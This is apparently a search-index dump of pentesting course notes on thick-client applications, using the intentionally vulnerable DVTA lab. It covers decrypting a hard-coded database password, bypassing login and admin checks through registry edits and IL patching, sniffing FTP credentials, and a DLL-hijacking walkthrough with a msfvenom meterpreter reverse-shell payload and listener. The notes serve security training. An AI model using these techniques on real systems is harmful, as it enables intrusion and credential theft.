              <add key=\"DBSERVER\" value=\"127.0.0.1\\SQLEXPRESS\" />\n<add key=\"DBNAME\" value=\"DVTA\" />\n<add key=\"DBUSERNAME\" value=\"sa\" />\n<add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n<add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n<add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n<add key=\"ClientSettingsProvider.ServiceUri\" value=\"\" />\n<add key=\"FTPSERVER\" value=\"127.0.0.1\" />\n
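
              The DBPASSWORD value looks base64-encoded, and the config conveniently ships the AESKEY and IV next to it. A minimal sketch of recovering the password under that assumption (AES-CBC with PKCS#7 padding, as used elsewhere in these notes):

              from base64 import b64decode\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nkey = b\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\"           # AESKEY from DVTA.exe.Config\niv = b\"fq20T0gMnXa6g0l4\"                             # IV from DVTA.exe.Config\nciphertext = b64decode(\"CTsvjZ0jQghXYWbSRcPxpQ==\")  # DBPASSWORD value\n\ncipher = AES.new(key, AES.MODE_CBC, iv)\n# clear-text password for the sa user, if the assumed scheme holds\nprint(Padding.unpad(cipher.decrypt(ciphertext), 16).decode())\n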
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#locate-credentials-and-information-in-registry-entries","title":"Locate credentials and information in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#processmonitor","title":"ProcessMonitor","text":"

Use Process Monitor (ProcMon) from the Sysinternals Suite to locate credentials and information stored in the registry keys. To do so, clear all events in ProcMon, then close the application and reopen it.

If the session is still there, it means that it is saved somewhere. In this case the session is saved in the registry keys.

An interesting finding here is the registry key \"isLoggedIn\". We could try to modify the boolean value of that key to bypass the login.
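A minimal sketch with reg.exe; the hive, key path and value type are assumptions based on the DVTA lab and will differ per application:

# Inspect the suspected session flag\nreg query \"HKCU\\dvta\" /v isLoggedIn\n# Force it to \"true\" to attempt a login bypass\nreg add \"HKCU\\dvta\" /v isLoggedIn /t REG_SZ /d \"true\" /f\n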

              Also, check these other tools and resources:

              • WinSpy.
              • Window Detective
              • netspi.com.
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#enumerate-libraries-and-resources-employed-in-building-the-app","title":"Enumerate libraries and resources employed in building the app","text":"

When pentesting a thick-client application, I came across this nice way to enumerate libraries, dependencies, sources... By using Sigcheck from the Sysinternals Suite, you can view metadata from the executable images. Additionally, you can save the results to a CSV file for reporting purposes.

.\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lots of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner: Do not display the startup banner and copyright message\n# Add -c to emit CSV output for reporting\n

              One cool flag is the recursive one (\"-s\"), which helps you avoid navigating through the folder structure.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-reversing-and-patching/","title":"Reversing and patching thick clients applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
• Attacking thick client applications.
• Reversing and patching thick client applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#reversing-net-applications","title":"Reversing .NET applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#required-software","title":"Required software","text":"
• dnSpy: C# code + IL code + patching the application
• dotPeek (from JetBrains)
• ILSpy / Reflexil
              • ILASM (IL Assembler) (comes with .NET Framework).
              • ILDASM (IL Disassembler) (comes with Visual Studio).

              IL stands for Intermediate Language.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-visual-studio-community-2019-version-1611","title":"Installing Visual Studio Community 2019 (version 16.11)","text":"

              Download from: https://my.visualstudio.com/Downloads?q=Visual%20Studio%202019

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-dotpeek","title":"Installing dotPeek","text":"

              dotPeek Cheatsheet Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-with-dotpeek-executing-with-visual-studio","title":"decompiling with dotPeek + executing with Visual Studio","text":"

We will try to decompile the app using dotPeek to understand how the database connection password is decrypted. Recall these values from the config file:

                    <add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n      <add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n      <add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n

              (The config file was DVTA.exe.Config, located in the same directory as the app).

We will use dotPeek + Visual Studio to understand the logic behind that connection.

Open the DVTA app in dotPeek, go to DVTA > References > DBAccess and double-click it. A resource named DBAccessClass will be loaded; in it there is a function called decryptPassword():

public string decryptPassword()\n    {\n      string s1 = ConfigurationManager.AppSettings[\"DBPASSWORD\"].ToString();\n      string s2 = ConfigurationManager.AppSettings[\"AESKEY\"].ToString();\n      string s3 = ConfigurationManager.AppSettings[\"IV\"].ToString();\n      byte[] inputBuffer = Convert.FromBase64String(s1);\n      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n      cryptoServiceProvider.BlockSize = 128;\n      cryptoServiceProvider.KeySize = 256;\n      cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(s2);\n      cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(s3);\n      cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n      cryptoServiceProvider.Mode = CipherMode.CBC;\n      this.decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n      Console.WriteLine(this.decryptedDBPassword);\n      return this.decryptedDBPassword;\n    }\n

So we will open Visual Studio and create a new project, a Windows Forms Application (.NET Framework). We will call the project PasswordDecryptor. Create a button and name it Decrypt.

              By double-clicking on the Decrypt button we will be taken to the Source code of that button.

              This is what we are going to put in that button:

using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\nusing System.Data;\nusing System.Drawing;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.Security.Cryptography;\n\nnamespace decryptorpassword\n{\n    public partial class Decrypt : Form\n    {\n        public Decrypt()\n        {\n            InitializeComponent();\n        }\n\n        private void button1_Click(object sender, EventArgs e)\n        {\n            string dbpassword = \"CTsvjZ0jQghXYWbSRcPxpQ==\";\n            string aeskey = \"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\";\n            string iv = \"fq20T0gMnXa6g0l4\";\n            byte[] inputBuffer = Convert.FromBase64String(dbpassword);\n            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n            cryptoServiceProvider.BlockSize = 128;\n            cryptoServiceProvider.KeySize = 256;\n            cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(aeskey);\n            cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(iv);\n            cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n            cryptoServiceProvider.Mode = CipherMode.CBC;\n            string decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n            Console.WriteLine(decryptedDBPassword);\n            // Optional: show the result in the GUI, since console output is only visible under a debugger\n            MessageBox.Show(decryptedDBPassword);\n        }\n    }\n}\n

Some things not mentioned in the video: it's quite possible you will need to debug this simple application. The best approach is to read the error messages and fix them one by one. In my case, a using directive required by this code was missing:

              using System.Security.Cryptography;\n

Also, the form class launched in the Main() function needed to be renamed to match my code:

// what it said\nApplication.Run(new Form1());\n// what it needed to say to match my code\nApplication.Run(new Decrypt());\n
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-and-executing-with-dnspy","title":"Decompiling and executing with dnspy","text":"

              1. Open the application in dnspy. Go to Login. Click on namespace DBAccess

              2. Click on DBAccessClass

3. Locate the function decryptPassword(). That's the one we want to run. Find where it is called from and add a breakpoint there. Run the code. You will be asked which executable to run (select DVTA.exe). After that, the code will execute up to the breakpoint. Enter credentials and watch in the debugger panels how the variables are populated.

              Eventually, you will see the decrypted connection string in those variables. You can add more breakpoints.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilspy-reflexil-to-patch-applications","title":"Using ILSpy + Reflexil to patch applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#ilspy-setup","title":"ILSpy Setup","text":"

              Repository: https://github.com/icsharpcode/ILSpy/releases

Requirements: .NET 6.0. Download the zip into your tools folder: place the file ILSpy_binaries_8.0.0.7246-preview3.zip there and extract the files.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#setup-reflexil-plugin-in-ilspy","title":"Setup Reflexil plugin in ILSpy","text":"

              1. Download from: https://github.com/sailro/Reflexil/releases

2. Place the file reflexil.for.ILSpy.2.7.bin into your tools folder and extract the files.

              3. Enter the Reflexil folder and copy the .dll file Reflexil.ILSpy.Plugin.dll.

              4. Place it into ILSpy directory. Now the plugin is installed.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#patching-with-ilspy-reflexil","title":"Patching with ILSpy + Reflexil","text":"

One interesting thing about ILSpy (compared with other tools) is that you can see code in 3 modes: IL, C#, and the combined mode, C# + IL. This last mode comes in handy for interpreting what the code is actually doing.

1. Open the DVTA app in ILSpy and locate this code:

Access to the admin panel is decided with an IF statement and an integer variable set to 0/1. We will modify this value using ILSpy + Reflexil and patch the application again.

              2. Open Reflexil plugin:

3. In the Reflexil panel, look for the specific instruction (the one that pushes the value 1 onto the stack) and change the value to 0.

              4. Save the changes in your DVTA application with a different name:

5. When opening the newly saved application, you will access the admin panel even if you log in with normal user credentials.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilasm-and-ldasm-to-patch-applications","title":"Using ilasm and ldasm to patch applications","text":"

ilasm (IL assembler) and ildasm (IL disassembler) are tools provided by Microsoft with the .NET Framework and Visual Studio.

We will use ILDASM to disassemble the DVTA application:

              C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\ildasm.exe\n

And ILASM to reassemble the application:

              C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n

              1. Open DVTA.exe with ILDASM.exe from command line:

2. Dump the assembly: File > Dump.

3. Save the dumped code (which will be IL) into a folder and close ILDASM. The generated folder contains the IL code; there is a specific file called DVTA.il.

4. Open DVTA.il in a text editor and modify the instruction you want to change. In our case we will change \"ldc.i4.1\" to \"ldc.i4.0\".

              5. From command line, we will use ILASM to assemble that DVTA.il file into a new application

              cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n.\\ilasm.exe C:\\User\\lala\\Desktop\\RE\\DVTA.il\n
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#anti-piracy-measures-implemented-by-some-apps","title":"Anti piracy measures implemented by some apps","text":"

Mechanisms to track or prevent illegitimate copying or usage of the software:

• Does the app use serial keys or license keys to ensure that only the allowed number of users can load and operate the software?
• Does the application stop operating after the expiration of the license or serial key?
• Does the application track legitimate and illegitimate usage?
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-traffic-analysis/","title":"Traffic analysis - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
• Attacking thick client applications.
• Reversing and patching thick client applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#tools-needed","title":"Tools needed","text":"
              • BurpSuite
              • Echo mirage, very old and not maintained.
              • mitm_relay
              • Wireshark

The difficult part is when the thick app does not use the HTTP/HTTPS protocol. In that case BurpSuite alone is not an option and we will need to use:

              • wireshark, it's ok if we just want to monitor.
              • Echo mirage, very old and not maintained.
              • mitm_relay + BurpSuite.
              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-wireshark","title":"Traffic monitoring with Wireshark","text":"

1. Make sure that the FileZilla Server is listening on port 21.

And we start the capture with Wireshark. We open DVTA with admin credentials and click on \"Back up Data to the FTP Server\". If we filter the capture in Wireshark, leaving only FTP traffic, we will be able to retrieve the user and password in plain text:
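The same capture can be scripted with tshark; a minimal sketch, assuming a Linux capture box with interface eth0 (list yours with tshark -D):

# Capture only the FTP control channel and display it live\ntshark -i eth0 -f \"tcp port 21\" -Y \"ftp\"\n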

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-echo-mirage","title":"Traffic monitoring with Echo mirage","text":"

1. Open Echo Mirage and add a rule to intercept all inbound and outbound traffic on port 21.

2. In the \"Process\" tab, choose Inject and select the application.

3. In the vulnerable app DVTA, log in as admin and click on the action \"Backup Data to FTP Server\". Now Echo Mirage will intercept the traffic. This way we can capture the USER and PASSWORD:

Also, by modifying the payload you can tamper with the request.

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-mitm_relay-burpsuite","title":"Traffic monitoring with mitm_relay + Burpsuite","text":"

              In DVTA we will configure the server to the IP of the local machine. In my lab setup, my IP was 10.0.2.15.

In the FTP server, we will configure the listening port to 2111. We will also disable the IP check for this lab setup to work.

              From https://github.com/jrmdev/mitm_relay:

              This is what we're doing:

1. The DVTA application sends traffic to port 21, so to intercept it we configure mitm_relay to listen on port 21.

2. mitm_relay encapsulates the application traffic (no matter the protocol) into the HTTP protocol so BurpSuite can read it.

3. Burp Suite will read the traffic, and here we can tamper with the data.

4. mitm_relay will \"unfunnel\" the traffic from the HTTP protocol back into the raw one.

5. In a lab setup the FTP server will be on the same host, so to avoid a conflict with mitm_relay (which is listening on port 21) we will change the FTP listening port to 2111. In real life this change is not necessary.

              Running mitm_relay:

python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l: listening address for mitm_relay (0.0.0.0 means listening on all interfaces)\n# -r: relay configuration: <protocol>:<listeningPort>:<IPofDestinationServer>:<listeningPortOnDestinationServer>\n# -p: proxy configuration: <IPofProxy>:<portOfProxy>\n

And this is what the interception looks like:

              ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/thick-application-checklist/","title":"Thick client Applications Pentesting Checklist","text":"

              Source

              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#information-gathering","title":"Information gathering","text":"
              **Information Gathering**\n\n- [ ]  Find out the application architecture (two-tier or three-tier)\n- [ ]  Find out the technologies used (languages and frameworks)\n- [ ]  Identify network communication\n- [ ]  Observe the application process\n- [ ]  Observe each functionality and behavior of the application\n- [ ]  Identify all the entry points\n- [ ]  Analyze the security mechanism (authorization and authentication)\n\n**Tools Used**\n\n- [ ]  CFF Explorer\n- [ ]  Sysinternals Suite\n- [ ]  Wireshark\n- [ ]  PEid\n- [ ]  Detect It Easy (DIE)\n- [ ]  Strings\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#gui-testing","title":"GUI testing","text":"
              **Test For GUI Object Permission**\n\n- [ ]  Display hidden form object\n- [ ]  Try to activate disabled functionalities\n- [ ]  Try to uncover the masked password\n\n**Test GUI Content**\n\n- [ ]  Look for sensitive information\n\n**Test For GUI Logic**\n\n- [ ]  Try for access control and injection-based vulnerabilities\n- [ ]  Bypass controls by utilizing intended GUI functionality\n- [ ]  Check improper error handling\n- [ ]  Check weak input sanitization\n- [ ]  Try privilege escalation (unlocking admin features to normal users)\n- [ ]  Try payment manipulation\n\n**Tools Used**\n\n- [ ]  UISpy\n- [ ]  Winspy++\n- [ ]  Window Detective\n- [ ]  Snoop WPF\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#file-testing","title":"File testing","text":"
              **Test For Files Permission**\n\n- [ ]  Check permission for each and every file and folder\n\n**Test For File Continuity**\n\n- [ ]  Check strong naming\n- [ ]  Authenticate code signing\n\n**Test For File Content Debugging**\n\n- [ ]  Look for sensitive information on the file system (symbols, sensitive data, passwords, configurations)\n- [ ]  Look for sensitive information on the config file\n- [ ]  Look for Hardcoded encryption data\n- [ ]  Look for Clear text storage of sensitive data\n- [ ]  Look for side-channel data leakage\n- [ ]  Look for unreliable log\n\n**Test For File And Content Manipulation**\n\n- [ ]  Try framework backdooring\n- [ ]  Try DLL preloading\n- [ ]  Perform Race condition check\n- [ ]  Test for Files and content replacement\n- [ ]  Test for Client-side protection bypass using reverse engineering\n\n**Test For Function Exported**\n\n- [ ]  Try to find the exported functions\n- [ ]  Try to use the exported functions without authentication\n\n**Test For Public Methods**\n\n- [ ]  Make a wrapper to gain access to public methods without authentication\n\n**Test For Decompile And Application Rebuild**\n\n- [ ]  Try to recover the original source code, passwords, keys\n- [ ]  Try to decompile the application\n- [ ]  Try to rebuild the application\n- [ ]  Try to patch the application\n\n**Test For Decryption And DE obfuscation**\n\n- [ ]  Try to recover original source code\n- [ ]  Try to retrieve passwords and keys\n- [ ]  Test for lack of obfuscation\n\n**Test For Disassemble and Reassemble**\n\n- [ ]  Try to build a patched assembly\n\n**Tools Used**\n\n- [ ]  Strings\n- [ ]  dnSpy\n- [ ]  Procmon\n- [ ]  Process Explorer\n- [ ]  Process Hacker\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#registry-testing","title":"REGISTRY TESTING","text":"
              **Test For Registry Permissions**\n\n- [ ]  Check read access to the registry keys\n- [ ]  Check to write access to the registry keys\n\n**Test For Registry Contents**\n\n- [ ]  Inspect the registry contents\n- [ ]  Check for sensitive info stored on the registry\n- [ ]  Compare the registry before and after executing the application\n\n**Test For Registry Manipulation**\n\n- [ ]  Try for registry manipulation\n- [ ]  Try to bypass authentication by registry manipulation\n- [ ]  Try to bypass authorization by registry manipulation\n\n**Tools Used**\n\n- [ ]  Regshot\n- [ ]  Procmon\n- [ ]  Accessenum\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#network-testing","title":"NETWORK TESTING","text":"
              **Test For Network**\n\n- [ ]  Check for sensitive data in transit\n- [ ]  Try to bypass firewall rules\n- [ ]  Try to manipulate network traffic\n\n**Tools Used**\n\n- [ ]  Wireshark\n- [ ]  TCPview\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#assembly-testing","title":"ASSEMBLY TESTING","text":"
              **Test For Assembly**\n\n- [ ]  Verify Address Space Layout Randomization (ASLR)\n- [ ]  Verify SafeSEH\n- [ ]  Verify Data Execution Prevention (DEP)\n- [ ]  Verify strong naming\n- [ ]  Verify ControlFlowGuard\n- [ ]  Verify HighentropyVA\n\n**Tools Used**\n\n- [ ]  PESecurity\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#memory-testing","title":"MEMORY TESTING","text":"
              **Test For Memory Content**\n\n- [ ]  Check for sensitive data stored in memory\n\n**Test For Memory Manipulation**\n\n- [ ]  Try for memory manipulation\n- [ ]  Try to bypass authentication by memory manipulation\n- [ ]  Try to bypass authorization by memory manipulation\n\n**Test For Run Time Manipulation**\n\n- [ ]  Try to analyze the dump file\n- [ ]  Check for process replacement\n- [ ]  Check for modifying assembly in the memory\n- [ ]  Try to debug the application\n- [ ]  Try to identify dangerous functions\n- [ ]  Use breakpoints to test each and every functionality\n\n**Tools Used**\n\n- [ ]  Process Hacker\n- [ ]  HxD\n- [ ]  Strings\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#traffic-testing","title":"TRAFFIC TESTING","text":"
              **Test For Traffic**\n\n- [ ]  Analyze the flow of network traffic\n- [ ]  Try to find sensitive data in transit\n\n**Tools Used**\n\n- [ ]  Echo Mirage\n- [ ]  MITM Relay\n- [ ]  Burp Suite\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#common-vulnerabilities-testing","title":"COMMON VULNERABILITIES TESTING","text":"
              **Test For Common Vulnerabilities**\n\n- [ ]  Try to decompile the application\n- [ ]  Try for reverse engineering\n- [ ]  Try to test with OWASP WEB Top 10\n- [ ]  Try to test with OWASP API Top 10\n- [ ]  Test for DLL Hijacking\n- [ ]  Test for signature checks (Use Sigcheck)\n- [ ]  Test for binary analysis (Use Binscope)\n- [ ]  Test for business logic errors\n- [ ]  Test for TCP/UDP attacks\n- [ ]  Test with automated scanning tools (Use Visual Code Grepper - VCG)\n
              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#shaped-by-hariprasaanth-r","title":"Shaped by: Hariprasaanth R","text":"

              Reach Me: LinkedIn Portfolio Github

              ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/tools-for-thick-apps/","title":"Tools for pentesting thick client applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
• Attacking thick client applications.
• Reversing and patching thick client applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#decompilation-tools","title":"Decompilation tools","text":"
              • C++ decompilation: https://ghidra-sre.org
• C# decompilation: dnSpy.
              • JetBrains dotPeek.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#read-app-metadata","title":"Read app metadata","text":"
• CFF Explorer. Open the app with CFF Explorer to see which language and tool were used to create it.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#sniff-connections","title":"Sniff connections","text":"
              • TCP View from sysInternalsSuite.
              • Wireshark.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#traffic-monitoring","title":"Traffic monitoring","text":"
              • wireshark, it's ok if we just want to monitor.
              • Echo mirage, very old and not maintained.
              • mitm_relay + BurpSuite.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#static-analysis","title":"Static analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-hard-coded-credentials","title":"Spot hard coded credentials","text":"
• Strings from the Sysinternals Suite. It's similar to the \"strings\" command in Linux: it displays all the human-readable strings in a binary (see the sketch below).
• dnSpy can be used to spot functions containing hard-coded credentials (for connections,...).
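A quick sketch; the binary name, minimum string length and keywords are illustrative:

# Dump readable strings of at least 8 characters and grep for credential-looking hits\n.\\strings.exe -n 8 DVTA.exe | findstr /i \"pass user key connection\"\n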
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#log-analysis","title":"Log analysis","text":"

              When debug mode is on, you can run:

              thick-app-name.exe > path/to/logs.txt\n
Open the file with the application logs and, if you are lucky and debug mode is still on, you will be able to see things such as SQL queries, decrypted database passwords, users, the temp location of the FTP file...
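For instance, a quick grep over the captured log (file name and keywords are illustrative):

findstr /i \"select insert password pwd\" path\\to\\logs.txt\n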

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dynamic-analysis","title":"Dynamic analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#changes-in-the-file-system","title":"Changes in the file system","text":"
• Use the Process Monitor tool from the Sysinternals Suite to see changes in the file system. For instance, you can analyze access to interesting files in the application directory in real time.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-sensitive-data-in-registry-entries","title":"Spot sensitive data in Registry entries","text":"
              • ProcessMonitor tool from sysInternalsSuite to spot changes in the Registry Entries.
              • regshot allows you to compare two snapshots of registry entries (before opening the application and during executing the application).
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#check-the-memory","title":"Check the memory","text":"

Process Hacker tool. During a connection to the database, the code that makes it may handle the connection string in clear text or encrypted. Even if it is encrypted, it is still possible to find it decrypted in memory. Process Hacker dumps the memory of the process, so we might find the clear-text connection string there.
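A sketch of searching such a dump; the dump path is illustrative, and \"Data Source\" is simply a common substring of SQL Server connection strings:

.\\strings.exe -n 10 C:\\dumps\\DVTA.dmp | findstr /i /C:\"Data Source\" /C:\"password\"\n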

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#scan-the-application","title":"Scan the application","text":"

Visual Code Grepper (VCG).

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#attacks","title":"Attacks","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dll-hickjacking","title":"DLL Hickjacking","text":"

              Step by step.

              1. Locate interesting DLL files with ProcessMonitor (or ProcMon).

2. Craft a malicious DLL with msfvenom on the attacker machine (see the sketch after these steps).

3. Serve it to the victim machine using an Apache server.

4. Place the file in the same directory from which it is going to be loaded.

              5. Run the app.
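A minimal sketch of steps 2 and 3; the payload, <attacker_ip>, port and file names are placeholders for a lab like this one:

# 2. Craft the malicious DLL on the attacker machine\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f dll -o hijacked.dll\n# 3. Serve it over HTTP (the Apache document root is an assumption)\nsudo cp hijacked.dll /var/www/html/\n# Catch the shell once the app loads the DLL\nmsfconsole -q -x \"use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST <attacker_ip>; set LPORT 4444; run\"\n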

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#reversing-net-applications","title":"Reversing .NET applications","text":"
• dnSpy: C# code + IL code + patching the application
• dotPeek (from JetBrains)
• ILSpy / Reflexil
              • ILASM (IL Assembler) (comes with .NET Framework).
              • ILDASM (IL Disassembler) (comes with Visual Studio).

              How to do it?

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#input-sanitization-sql-injections","title":"Input sanitization: SQL injections","text":"

              Manually

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#application-signing","title":"Application Signing","text":"

              Sigcheck, from SysInternals Suite (more).

              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#compiler-protection","title":"Compiler protection","text":"

              Binscope.

PESecurity is a PowerShell script that checks whether a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.
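A minimal sketch, assuming the Get-PESecurity.psm1 module file from the PESecurity repository and an illustrative binary path:

Import-Module .\\Get-PESecurity.psm1\nGet-PESecurity -file C:\\Apps\\DVTA\\DVTA.exe\n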

              Also, check these other tools and resources:

              • WinSpy.
              • Window Detective
              • netspi.com.
              ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"webexploitation/","title":"Web exploitation guide","text":"OWASP Attack Tools Payloads WSTG-INPV-12 Command injection attack
              • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
              • CRLF attack - Carriage Return and LineFeed attack
                • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection.
                • WSTG-SESS-05 CSRF attack - Cross Site Request Forgery attack BurpSuite, CSRFTester
